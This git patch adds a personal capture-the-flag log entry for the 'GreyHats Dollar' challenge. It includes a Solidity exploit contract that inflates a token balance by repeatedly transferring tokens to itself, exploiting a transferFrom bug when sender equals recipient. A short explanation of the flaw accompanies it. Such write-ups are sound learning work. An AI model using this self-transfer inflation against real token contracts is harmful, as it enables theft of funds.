From 27d7987e8b20e54eb42c53976a1c268917c2747d Mon Sep 17 00:00:00 2001
From: doublespending <outofgas@qq.com>
Date: Sat, 21 Sep 2024 15:00:06 +0800
Subject: [PATCH] Add day24 of doublespending

---
 .../doublespending/day24/greyhats-dollar.sol  | 31 +++++++++++++++++++
 doublespending.md                             | 10 ++++++
 2 files changed, 41 insertions(+)
 create mode 100644 Writeup/doublespending/day24/greyhats-dollar.sol

diff --git a/Writeup/doublespending/day24/greyhats-dollar.sol b/Writeup/doublespending/day24/greyhats-dollar.sol
new file mode 100644
index 00000000..dd34c9ac
--- /dev/null
+++ b/Writeup/doublespending/day24/greyhats-dollar.sol
@@ -0,0 +1,31 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity 0.8.15;
+
+import { Setup } from "src/greyhats-dollar/Setup.sol";
+
+contract Exploit {
+    Setup setup;
+
+    constructor(Setup _setup) {
+        setup = _setup;
+    }
+
+    function solve() external {
+        // Claim 1000 GREY
+        setup.claim();
+
+        // Mint 1000 GHD using 1000 GREY
+        setup.grey().approve(address(setup.ghd()), 1000e18);
+        setup.ghd().mint(1000e18);
+
+        // Transfer GHD to ourselves until we have 50,000 GHD
+        uint256 balance = setup.ghd().balanceOf(address(this));
+        while (balance < 50_000e18) {
+            setup.ghd().transfer(address(this), balance);
+            balance = setup.ghd().balanceOf(address(this));
+        }
+
+        // Transfer all GHD to msg.sender
+        setup.ghd().transfer(msg.sender, balance);
+    }
+}
\ No newline at end of file
diff --git a/doublespending.md b/doublespending.md
index 6013028c..76c8e5cc 100644
--- a/doublespending.md
+++ b/doublespending.md
@@ -356,4 +356,14 @@ B: [EthTaipei CTF 2023](https://github.com/dinngo/ETHTaipei-war-room/)(5)
       - We should find a way to distinguish the two sequential static call. - We can use `gasleft()`
       - We can find a value `i` - `gasleft() % i == 0` in the first call - `gasleft() % i != 0` in the second call
 
+### 2024.09.21
+
+B: [Grey Cat the Flag 2024 Milotruck challs](https://github.com/MiloTruck/evm-ctf-challenges) (6)
+
+- GreyHats Dollar
+  - The share finally updates at this [line](https://github.com/MiloTruck/evm-ctf-challenges/blob/a385836e1e83543b06ff3b8108cf962f4d74a49d/src/greyhats-dollar/GHD.sol#L133)
+  - `transferFrom` has not consider the case that `from` equals to `to`.
+    - At this case, we get [`shares[to=from] = origin + _shares`](https://github.com/MiloTruck/evm-ctf-challenges/blob/a385836e1e83543b06ff3b8108cf962f4d74a49d/src/greyhats-dollar/GHD.sol#L133)
+    - However, the share is expected unchanged.
+
 <!-- Content_END -->